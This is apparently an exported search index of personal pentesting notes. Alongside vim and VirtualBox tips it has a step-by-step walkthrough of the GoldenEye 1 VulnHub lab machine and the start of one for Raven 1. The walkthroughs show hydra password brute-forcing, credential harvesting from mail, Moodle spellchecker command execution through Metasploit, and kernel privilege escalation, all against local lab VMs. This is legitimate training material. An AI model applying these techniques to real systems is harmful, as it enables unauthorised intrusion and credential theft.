        # Press Esc key to enter CURSOR mode.\n:x\n# Hit ENTER\n

        To save the file with a different name:

        # Press ESC key to enter CURSOR mode.\n:w <newFileName>\n# Hit ENTER\n
        "},{"location":"vim/#browsing-activities-in-the-editor","title":"Browsing activities in the editor","text":"

        Keys g+d: highlight the definition of a variable/function/... in the file. Keys g+f: takes you to the definition of that variable/function/... in the file, even if it's a different file from the one we have open. Our browsing activity will pile up in the VIM editor.

        To switch between activities:

        • CTRL+o : Go back into the browsing activity.
        • CTRL+i : Go forward.
        "},{"location":"vim/#search-in-cursor-mode","title":"Search in CURSOR mode","text":"

        Search from cursor position with:

        • \\expression : Search word expression.
        • n : Go to the next occurrence.
        • N : Go to previous occurrence.
        • ESC : Escape the search.
        "},{"location":"vim/#browsing-from-opening-and-closing-tags","title":"Browsing from opening and closing tags","text":"

        Move the cursor position from a closing parenthesis to the opening one:

        • % : Change position between opening or closing tags () [] \" \"
        "},{"location":"vim/#substitute-in-cursor-mode","title":"Substitute in CURSOR mode","text":"

        To change \"expresion1\" to \"expresion2\" for the first occurrence:

        # Press ESC key to enter CURSOR mode.\n:s/expression1/expression2\n

        To change all occurrences of the line:

        # Press ESC key to enter CURSOR mode.\n:s/expression1/expression2/g\n

        To change all occurrences in the document (not asking one by one):

        # Press ESC key to enter CURSOR mode.\n:s%/expression1/expression2/g\n

        To change all occurrences in the document asking one by one:

        # Press ESC key to enter CURSOR mode.\n:s%/expression1/expression2/gc\n
        "},{"location":"virtualbox/","title":"VirtualBox and Extension Pack","text":"

        How to install the Extension Pack manually, bypassing possible policies existing in a Windows DC.

        1. The .vbox-extpack file that can be downloaded. Actually, it is just a .tar.gz archive so its contents can be unpacked.
        2. Place these contents in subdirectory ExtensionPacks of the VirtualBox installation directory, tipically C:\\Program Files\\Oracle\\VirtualBox
        3. That's it. Run Virtualbox and click on Install extension in the corresponding section. Installation now will be successful.
        ","tags":["windows","bypass techniques"]},{"location":"virtualbox/#how-to-enlarge-a-virtual-machines-disk-in-virtualbox","title":"How to Enlarge a Virtual Machine\u2019s Disk in VirtualBox","text":"

        In VirtualBox, go to File > Virtual Media Manager and use the slider to adjust the disk size. In VMWare, right-click your virtual machine (VM), then go to Settings > Hard Disk > Expand, and expand the disk. Finally, boot your VM and expand the partition using GParted on Linux or Disk Management on Windows.

        ","tags":["windows","bypass techniques"]},{"location":"vnstat/","title":"vnstat - Monitoring network impact","text":"","tags":["network","bash","tools"]},{"location":"vnstat/#installation","title":"Installation","text":"
        sudo apt install vnstat    \n
        ","tags":["network","bash","tools"]},{"location":"vnstat/#basic-usage","title":"Basic usage","text":"

        Monitor the eth0 network adapter before running a Nessus scan:

        sudo vnstat -l -i eth0\n
        ","tags":["network","bash","tools"]},{"location":"vpn/","title":"VPN notes","text":"

        There are two main types of remote access VPNs: client-based VPN and SSL VPN. SSL VPN uses the web browser as the VPN client.

        Usage of a VPN service does not guarantee anonymity or privacy but is useful for bypassing certain network/firewall restrictions or when connected to a possible hostile network.

        When connected to any penetration testing/hacking-focused lab, we should always consider the network to be \"hostile.\" We should only connect from a virtual machine, disallow password authentication if SSH is enabled on our attacking VM, lockdown any web servers, and not leave sensitive information on our attack VM.

        DO NOT use the same VM that we use to perform client assessments to play CTF in any platform .

        # Show us the networks accessible via the VPN.\n netstat -rn\n
        ","tags":["vpn"]},{"location":"vulnerability-assessment/","title":"Vulnerability assessment","text":"

        Tools: nessus, openvas

        ","tags":["pentesting","assessment","openvas","nessus"]},{"location":"vulnhub-goldeneye-1/","title":"Walkthrough - GoldenEye 1, a vulnhub machine","text":"","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#about-the-machine","title":"About the machine","text":"data Machine GoldenEye 1 Platform Vulnhub url link Download https://drive.google.com/open?id=1M7mMdSMHHpiFKW3JLqq8boNrI95Nv4tq Download Mirror https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova Size 805 MB Author creosote Release date 4 May 2018 Description OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt. Difficulty Easy","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#walkthrough","title":"Walkthrough","text":"","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#setting-up-the-machines","title":"Setting up the machines","text":"

        I'll be using Virtual Box.

        Kali machine (from now on: attacker machine) will have two network interfaces:

        • eth0 interface: NAT mode (for internet connection).
        • eth1 interface: Host-only mode (for attacking the victim machine).

        GoldenEye 1 machine (from now on: victim machine) will have only one network interface:

        • eth0 interface.
        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#reconnaissance","title":"Reconnaissance","text":"","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#first-we-need-to-identify-our-ip-and-afterwards-our-ips-victim-address","title":"First, we need to identify our IP, and afterwards our IP's victim address.","text":"

        For that we'll be using netdiscover.

        ip a\n

        eth1 interface of the attacker machine will be: 192.168.56.105.

        sudo netdiscover -i eth1 -r 192.168.56.105/24\n

        Results:

         3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                   \n _____________________________________________________________________________\n   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      \n -----------------------------------------------------------------------------\n 192.168.56.1    0a:00:27:00:00:00      1      60  Unknown vendor                                                  \n 192.168.56.100  08:00:27:66:9a:ab      1      60  PCS Systemtechnik GmbH                                          \n 192.168.56.101  08:00:27:dd:34:ac      1      60  PCS Systemtechnik GmbH\n ```\n\n So, the victim's IP address is: 192.168.56.101.\n\n\n#### **Secondly**, let's run a port scan to see services:\n\n```bash\nnmap -p- -A 192.168.56.101\n

        And results:

        Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-17 13:31 EST\nNmap scan report for 192.168.56.101\nHost is up (0.00013s latency).\nNot shown: 65531 closed tcp ports (conn-refused)\nPORT      STATE SERVICE  VERSION\n25/tcp    open  smtp     Postfix smtpd\n|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN\n| ssl-cert: Subject: commonName=ubuntu\n| Not valid before: 2018-04-24T03:22:34\n|_Not valid after:  2028-04-21T03:22:34\n|_ssl-date: TLS randomness does not represent time\n80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))\n|_http-title: GoldenEye Primary Admin Server\n|_http-server-header: Apache/2.4.7 (Ubuntu)\n55006/tcp open  ssl/pop3 Dovecot pop3d\n|_pop3-capabilities: SASL(PLAIN) RESP-CODES TOP USER UIDL PIPELINING AUTH-RESP-CODE CAPA\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server\n| Not valid before: 2018-04-24T03:23:52\n|_Not valid after:  2028-04-23T03:23:52\n55007/tcp open  pop3     Dovecot pop3d\n|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE STLS SASL(PLAIN) USER CAPA PIPELINING TOP UIDL\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server\n| Not valid before: 2018-04-24T03:23:52\n|_Not valid after:  2028-04-23T03:23:52\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 40.89 seconds\n

        As there is an Apache server, let's see what is in there. We'll be opening http://192.168.56.101 in our browser.

        In the front page they will give you an url to login: /serv-home/, and looking at the source code, in the terminal.js file you can read a section commented out:

        //\n//Boris, make sure you update your default password. \n//My sources say MI6 maybe planning to infiltrate. \n//Be on the lookout for any suspicious network traffic....\n//\n//I encoded you p@ssword below...\n//\n//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;\n//\n//BTW Natalya says she can break your codes\n//\n

        Now, we have two usernames: boris and natalya, and we also have an aparently URL-encoded password. By using Burp Decode, we can extract the password: InvincibleHack3r

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#third-now-we-can-browse-to-http19216856101sev-home","title":"Third, now we can browse to http://192.168.56.101/sev-home","text":"

        A Basic-Authentification pop-up layer will be displayed. To login into the system, enter:

        • user: boris
        • password: InvincibleHack3r
        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fourth-in-the-landing-page-we-can-read-this-valuable-information","title":"Fourth, in the landing page we can read this valuable information:","text":"

        \"Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port\".

        Also by looking at the source code we can read this commented line:

        <!-- Qualified GoldenEye Network Operator Supervisors: Natalya Boris -->\n

        mmmm

        As we know there are some high ports (such as 55006 and 55007) open and running dovecot pop3 service, maybe we can try to access it with the telnet protocol in port 55007. Also, we could have used netcat.

        telnet 192.168.56.101 55007\n

        Results:

        Trying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nUSER boris\n+OK\nPASSWORD InvincibleHack3r\n-ERR Unknown command.\nPASS InvincibleHack3r\n-ERR [AUTH] Authentication failed.\nUSER natalya\n+OK\nPASS InvincibleHack3r\n-ERR [AUTH] Authentication failed.\n
        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fifth-lets-try-to-brute-force-the-service-by-using-hydra","title":"Fifth, let's try to brute-force the service by using hydra.","text":"
        hydra -l boris -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3\n

        And the results:

        Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-17 13:57:42\n[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task\n[DATA] attacking pop3://192.168.56.101:55007/\n[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active\n[STATUS] 72.00 tries/min, 144 tries in 00:02h, 78 to do in 00:02h, 16 active\n[55007][pop3] host: 192.168.56.101   login: boris   password: secret1!\n1 of 1 target successfully completed, 1 valid password found\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-17 14:00:19\n

        We do the same for the user natalya.

        hydra -l natalya -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3\n

        And the results:

        Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-19 13:45:18\n[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task\n[DATA] attacking pop3://192.168.56.101:55007/\n[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active\n[55007][pop3] host: 192.168.56.101   login: natalya   password: bird\n[STATUS] 111.00 tries/min, 222 tries in 00:02h, 1 to do in 00:01h, 15 active\n1 of 1 target successfully completed, 1 valid password found\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-19 13:47:19\n

        So now, we have these credentials for the dovecot pop3 service:

        • user: boris
        • password: secre1!

        • user: natalya

        • password: bird
        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#sixth-lets-access-dovecot-pop3-service","title":"Sixth, let's access dovecot pop3 service","text":"

        We can use telnet as before:

        telnet 192.168.56.101 55007\n

        Results:

        Trying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nUSER boris\n+OK\nPASS secret1!\n+OK Logged in.\n

        Let's going to see all messages in our inbox:

        # List messages in inbox\nLIST\n

        Results:

        +OK 3 messages:\n1 544\n2 373\n3 921\n.\n

        Now let's RETRIEVE all messages from inbox:

        # For retrieving first message:\nRETR 1\n\n# For retrieving second message:\nRETR 2\n\n# For retrieving third message:\nRETR 3\n\n# For retrieving fourth message:\nRETR 4\n\n# There was no fifth message\n

        And messages are:

        RETR 1\n+OK 544 octets\nReturn-Path: <root@127.0.0.1.goldeneye>\nX-Original-To: boris\nDelivered-To: boris@ubuntu\nReceived: from ok (localhost [127.0.0.1])\n        by ubuntu (Postfix) with SMTP id D9E47454B1\n        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)\nMessage-Id: <20180425022326.D9E47454B1@ubuntu>\nDate: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)\nFrom: root@127.0.0.1.goldeneye\n\nBoris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.\n.\nRETR 2\n+OK 373 octets\nReturn-Path: <natalya@ubuntu>\nX-Original-To: boris\nDelivered-To: boris@ubuntu\nReceived: from ok (localhost [127.0.0.1])\n        by ubuntu (Postfix) with ESMTP id C3F2B454B1\n        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)\nMessage-Id: <20180425024249.C3F2B454B1@ubuntu>\nDate: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)\nFrom: natalya@ubuntu\n\nBoris, I can break your codes!\n.\nRETR 3\n+OK 921 octets\nReturn-Path: <alec@janus.boss>\nX-Original-To: boris\nDelivered-To: boris@ubuntu\nReceived: from janus (localhost [127.0.0.1])\n        by ubuntu (Postfix) with ESMTP id 4B9F4454B1\n        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)\nMessage-Id: <20180425025235.4B9F4454B1@ubuntu>\nDate: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)\nFrom: alec@janus.boss\n\nBoris,\n\nYour cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!\n\nOnce Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....\n\nPS - Keep security tight or we will be compromised.\n\n.\nRETR 5\n-ERR There's no message 5.\n

        Now, let's do the same for natalya:

        \u2514\u2500$ telnet 192.168.56.101 55007\nTrying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nuser natalya\n+OK\npass bird\n+OK Logged in.\nlist\n+OK 2 messages:\n1 631\n2 1048\n.\nretr 1\n+OK 631 octets\nReturn-Path: <root@ubuntu>\nX-Original-To: natalya\nDelivered-To: natalya@ubuntu\nReceived: from ok (localhost [127.0.0.1])\n        by ubuntu (Postfix) with ESMTP id D5EDA454B1\n        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)\nMessage-Id: <20180425024542.D5EDA454B1@ubuntu>\nDate: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)\nFrom: root@ubuntu\n\nNatalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.\n\nAlso, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.\n.\nretr 2\n+OK 1048 octets\nReturn-Path: <root@ubuntu>\nX-Original-To: natalya\nDelivered-To: natalya@ubuntu\nReceived: from root (localhost [127.0.0.1])\n        by ubuntu (Postfix) with SMTP id 17C96454B1\n        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)\nMessage-Id: <20180425031956.17C96454B1@ubuntu>\nDate: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)\nFrom: root@ubuntu\n\nOk Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of \"security\"...it'll get the change order escalated without much hassle :)\n\nOk, user creds are:\n\nusername: xenia\npassword: RCP90rulez!\n\nBoris verified her as a valid contractor so just create the account ok?\n\nAnd if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir\n**Make sure to edit your host file since you usually work remote off-network....\n\nSince you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.\n.\n
        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#exploitation","title":"Exploitation","text":"

        Somehow, without really being aware of it, we have already entered into an Exploitation phase. In this phase, our findings will take us further so eventually we will be gaining access to the system.

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#first-use-credentials-to-access-the-webservice","title":"First, use credentials to access the webservice","text":"

        From our reconnaissance / exploitation of the dovecot pop3 service we have managed to gather these new credentials:

        • username: xenia
        • password: RCP90rulez!

        And we also have the instruction to add this line to our /etc/hosts file:

        # We open the /etc/hosts file and add this line at the end\n192.168.56.101  severnaya-station.com/gnocertdir \n

        Now, in our browser we can go to that address and we can confirm that we have a moodle cms. We can login using the credentials for the user xenia.

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#second-gather-information-and-try-to-exploit-it","title":"Second, gather information and try to exploit it","text":"

        Browsing around we can retrieve the name of twot other users:

        With these two new users in mind we can use hydra again to try to brute force them. Run in two separate tabs:

        hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3\nhydra -l admin -P /usr/share/wordlists/fasttrack.txt 192.168.56.101 -s55007 pop3 \n

        And we obtain results only for the username doak:

        Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-19 12:07:05\n[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 222 login tries (l:1/p:222), ~14 tries per task\n[DATA] attacking pop3://192.168.56.101:55007/\n[STATUS] 80.00 tries/min, 80 tries in 00:01h, 142 to do in 00:02h, 16 active\n[STATUS] 64.00 tries/min, 128 tries in 00:02h, 94 to do in 00:02h, 16 active\n[55007][pop3] host: 192.168.56.101   login: doak   password: goat\n1 of 1 target successfully completed, 1 valid password found\n
        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#third-login-into-dovecot-using-the-credentials-found","title":"Third, login into dovecot using the credentials found","text":"
        • user: doak
        • password: goat

        And now, let's read the messages:

        Trying 192.168.56.101...\nConnected to 192.168.56.101.\nEscape character is '^]'.\n+OK GoldenEye POP3 Electronic-Mail System\nuser doak\n+OK\npass goat\n+OK Logged in.\nlist\n+OK 1 messages:\n1 606\n.\nretr 1\n+OK 606 octets\nReturn-Path: <doak@ubuntu>\nX-Original-To: doak\nDelivered-To: doak@ubuntu\nReceived: from doak (localhost [127.0.0.1])\n        by ubuntu (Postfix) with SMTP id 97DC24549D\n        for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)\nMessage-Id: <20180425034731.97DC24549D@ubuntu>\nDate: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)\nFrom: doak@ubuntu\n\nJames,\nIf you're reading this, congrats you've gotten this far. You know how tradecraft works right?\n\nBecause I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......\n\nusername: dr_doak\npassword: 4England!\n\n.\n
        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fourth-log-into-moodle-with-new-credentials-and-browse-the-service","title":"Fourth, Log into moodle with new credentials and browse the service","text":"

        As we have disclosed, again, a new credential for the moodle site, let's login and see what we can find:

        • username: dr_doak
        • password: 4England!

        After browsing around as user dr_doak we can download a field with some more information:

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#fifth-analyse-the-image","title":"Fifth, analyse the image","text":"

        An image in a secret location is shared with us. Let's download it from http://severnaya-station.com/dir007key/for-007.jpg

        Aparently this image has nothing juicy, but if we look their metadata with exiftool, then... magic happens:

        exiftool for-007.jpg \n

        Results:

        ExifTool Version Number         : 12.49\nFile Name                       : for-007.jpg\nDirectory                       : Downloads\nFile Size                       : 15 kB\nFile Modification Date/Time     : 2023:01:19 12:37:35-05:00\nFile Access Date/Time           : 2023:01:19 12:37:35-05:00\nFile Inode Change Date/Time     : 2023:01:19 12:37:35-05:00\nFile Permissions                : -rw-r--r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image/jpeg\nJFIF Version                    : 1.01\nX Resolution                    : 300\nY Resolution                    : 300\nExif Byte Order                 : Big-endian (Motorola, MM)\nImage Description               : eFdpbnRlcjE5OTV4IQ==\nMake                            : GoldenEye\nResolution Unit                 : inches\nSoftware                        : linux\nArtist                          : For James\nY Cb Cr Positioning             : Centered\nExif Version                    : 0231\nComponents Configuration        : Y, Cb, Cr, -\nUser Comment                    : For 007\nFlashpix Version                : 0100\nImage Width                     : 313\nImage Height                    : 212\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)\nImage Size                      : 313x212\nMegapixels                      : 0.066\n

        One field catches our attention: \"Image Description\". The value for that field is not very... descriptable: eFdpbnRlcjE5OTV4IQ==.

        The two equal signs at the end suggest that maybe base64 encode encryption is been employed. Let's use BurpSuite to decode it.

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#sixth-now-we-can-login-into-the-moodle-with-admin-credentials","title":"Sixth, now we can login into the moodle with admin credentials","text":"
        • user: admin
        • password: xWinter1995x!

        As we are admin, we can browse in the sidebar to: Setting > Site administration > Server > Environment. There we can grab the banner with the version of the running moodle: 2.2.3.

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#seventh-google-for-some-exploits-for-moodle-223","title":"Seventh, google for some exploits for moodle 2.2.3","text":"

        You can get to these results:

        • https://www.rapid7.com/db/modules/exploit/multi/http/moodle_cmd_exec/.
        • https://www.exploit-db.com/exploits/29324

        Here, an explanation of the vulnerability: moodle 2.2.3 has a plugin for checking out spelling. When creating a blog entry (for instance), the user can click on a bottom to check the spelling. In the backend, this triggers a connection with a service. Vulnerability here is that an admin user can modify the path to the service to include a one-lined reverse shell. This shell is going to be called when you click on the Check spelling button. For this to work, open a netcat listener in your machine. Also, in the plugins settings, you might need to change the configuration.

        I'm not a big fan of metasploit, but in this case I've used it.

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#eight-metasploit-geting-a-shell","title":"Eight: Metasploit, geting a shell","text":"

        Module multi/http/moodle_spelling_binary_rce

        I've employed the module multi/http/moodle_spelling_binary_rce. Basically, Moodle allows an authenticated user to define spellcheck settings via the web interface. The user can update the spellcheck mechanism to point to a system-installed aspell binary. By updating the path for the spellchecker to an arbitrary command, an attacker can run arbitrary commands in the context of the web application upon spellchecking requests. This module also allows an attacker to leverage another privilege escalation vuln. Using the referenced XSS vuln, an unprivileged authenticated user can steal an admin sesskey and use this to escalate privileges to that of an admin, allowing the module to pop a shell as a previously unprivileged authenticated user. This module was tested against Moodle version 2.5.2 and 2.2.3.

        • https://nvd.nist.gov/vuln/detail/CVE-2013-3630
        • https://nvd.nist.gov/vuln/detail/CVE-2013-4341
        • https://www.exploit-db.com/exploits/28174
        • https://www.rapid7.com/blog/post/2013/10/30/seven-tricks-and-treats

        Now, we move our session to background with CTRL-z.

        Module post/multi/manage/shell_to_meterpreter

        Our goal now is going to be to move from a cmd/unix shell to a more powered meterpreter. This will allow us later on to execute a module in metasploit to escalate privileges.

        search shell_to_meterpreter\n

        We'll be using the module \"post/multi/manage/shell_to_meterpreter\".

        We only need to set session, and LHOST.

        If everything is ok, now we'll have two sessions.

        We've done this to be able to escalate privileges, since the session with shell cmd/unix didn't allow us to escalate privileges using exploit/linux/local/overlayfs_priv_esc.

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#escalating-privileges","title":"Escalating privileges","text":"

        Module exploit/linux/local/overlayfs_priv_esc

        We'll be using this module to escalate privileges. How have we got here? We run:

        uname -a\n

        Results:

        Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux\n

        Now, after googling \"exploit escalate privileges ubuntu 3.13.0\", we get:

        • https://www.exploit-db.com/exploits/37292.
        • https://www.rapid7.com/db/modules/exploit/linux/local/overlayfs_priv_esc/.

        Using any of these ways to exploit Goldeneye1 is ok. If you go for the first option and upload the exploit to the machine, you will soon realize that the victim machine has not installed the gcc compiler, so you will need to use cc compiler (and modify the code of the exploit). As for the second option, which I chose, metasploit is not going to work with the cmd/unix session. Error message is similar: gcc is not installed and code can not be compiled. You will need to set the meterpreter session for this attack to succeed.

        The module exploit/linux/local/overlayfs_priv_esc attempts to exploit two different CVEs related to overlayfs. CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55 3.16.0-25 (14.10 default) < 3.16.0-41 3.19.0-18 (15.04 default) < 3.19.0-21 CVE-2015-8660: Ubuntu: 3.19.0-18 < 3.19.0-43 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10) Fedora: < 4.2.8 (vulnerable, un-tested) Red Hat: < 3.10.0-327 (rhel 6, vulnerable, un-tested).

        To exploit it, we need to use session 2.

        ","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#last-getting-the-flag","title":"Last, getting the flag","text":"

        Now, we can cat the flag:

        cat .flag.txt\nAlec told me to place the codes here: \n\n568628e0d993b1973adc718237da6e93\n\nIf you captured this make sure to go here.....\n/006-final/xvf7-flag/\n

        Isn't is just fun???

        ","tags":["walkthrough"]},{"location":"vulnhub-raven-1/","title":"Walkthrough: Raven 1, a vulnhub machine","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#about-the-machine","title":"About the machine","text":"data Machine Raven 1 Platform Vulnhub url link Download https://drive.google.com/open?id=1pCFv-OXmknLVluUu_8ZCDr1XYWPDfLxW Download Mirror https://download.vulnhub.com/raven/Raven.ova Size 1.4 GB Author William McCann Release date 14 August 2018 Description Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networking. Difficulty Beginner/Intermediate OS Linux","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#walkthrough","title":"Walkthrough","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#setting-up-the-machines","title":"Setting up the machines","text":"

        I'll be using Virtual Box.

        Kali machine (from now on: attacker machine) will have two network interfaces:

        • eth0 interface: NAT mode (for internet connection).
        • eth1 interface: Host-only mode (for attacking the victim machine).

        Raven 1 machine (from now on: victim machine) will have only one network interface:

        • eth0 interface.

        After running

        ip a\n
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#reconnaissance","title":"Reconnaissance","text":"","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#identify-victims-ip","title":"Identify victim's IP","text":"

        we know that the attacker's machine IP address is 192.168.56.102/24. To discover the victim's machine IP, we run:

        sudo netdiscover -i eth1 -r 192.168.56.102/24\n

        These are the results:

        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#scan-victims-surface-attack","title":"Scan victim's surface attack","text":"

        Now we can run a scanner to see which services are running on the victim's machine:

        sudo nmap -p- -A 192.168.56.104\n

        And the results:

        Having a web server in port 80, it's inevitable to open a browser and have a look at it. Also, at the same time, we can run a simple enumeration scan:

        dirb http://192.168.56.104\n

        The results are pretty straightforward:

        There is a wordpress installation (maybe not well accomplished) running on the server. Also there are some services installed such as PHPMailer.

        By reviewing the source code in the pages we find the first flag:

        Here, flag1 in plain text:

        <!-- End footer Area -->        \n            <!-- flag1{b9bbcb33e11b80be759c4e844862482d} -->\n
        ","tags":["pentesting","web pentesting","walkthrough"]},{"location":"vulnhub-raven-1/#deeper-scan-with-specific-tool-for-wordpress-service-wpsca","title":"Deeper scan with specific tool for wordpress service: wpsca","text":"

        First, let's start by running a much deeper scanner with wpscan. We'll be enumerating users,

        wpscan --url http://192.168.56.104/wordpress --enumerate u --force --wp-content-dir wp-content\n

        And the results show us some interesting findings:

        First, one thing that later may be useful: XML-RPC seems to be enabled: http://192.168.56.104/wordpress/xmlrpc.php. What does this service do? It allows authentication to post entries. It's also useful in wordpress for retrieving pings when a post is linked back. This means that it's also an open door for exploitation. We'll return to this later.

        Opening the browser in http://192.168.56.104/wordpress/readme.html, we can see some instructions to set up the wordpress installation.

        As a matter of fact, by clicking on http://192.168.56.104/wp-admin/install.php, we end up on a webpage like this:

        Nice, so, the link button is giving us a tip, we need to include a redirection in our /etc/hosts file.

        sudo nano /etc/hosts\n

        At the end of the file we add the following line:

        192.168.56.104  local.raven\n# CTRL-s  and CTRL-x\n

        Now we can browse perfectly the wordpress site. Also, finishing our wpscan, there are two more interesting findings:

        These findings are:

        • Wordpress: WordPress version 4.8.7 identified (Insecure, released on 2018-07-05).
        • User enumeration: steven and michael.

        We can also detect those users manually, simply by brute-forcing the author enumeration. See screenshot:

        To manually brute force users in a wordpress installation, you just need to go to:

        • targetURL/?author=1

        Author with id=1 (as in the example) is the first user created during the CMS installation, which usually coincides with the admin user. To see the next user, you just need to change the number. Ids are correlative. By checking the source code (as in the previous screenshot) you can gather users (steven and michael), but also worpress version (4.8.7) and theme (TwentySeventeen).

        So, what do we have so far?

        • Server: Apache/2.4.10 (Debian)
        • CMS: WordPress version 4.8.7 identified (Insecure, released on 2018-07-05)
        • Theme: twentySeventeen
        • XML-RPC seems to be enabled: http://192.168.56.104/wordpress/xmlrpc.php.
        • Login page: http://raven.local/wordpress/wp-login.php
        • Two users: steven, michael.
